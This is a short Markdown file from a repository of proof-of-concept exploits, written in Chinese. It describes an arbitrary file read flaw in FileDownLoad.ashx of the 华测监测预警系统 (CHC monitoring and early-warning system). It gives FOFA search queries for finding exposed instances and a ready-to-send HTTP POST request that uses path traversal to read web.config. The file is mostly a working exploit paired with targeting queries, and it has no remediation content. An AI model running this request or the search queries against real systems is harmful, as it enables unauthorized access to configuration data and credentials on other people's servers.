POC/wpoc/华测监测预警系统/华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

30 lines
605 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞
华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞通过读取配置文件获取重要数据。
## fofa
```jade
app="华测监测预警系统2.2"
```
```javascript
icon_hash="-628229493"
```
## poc
```javascript
POST /Handler/FileDownLoad.ashx HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
filename=1&filepath=../../web.config
```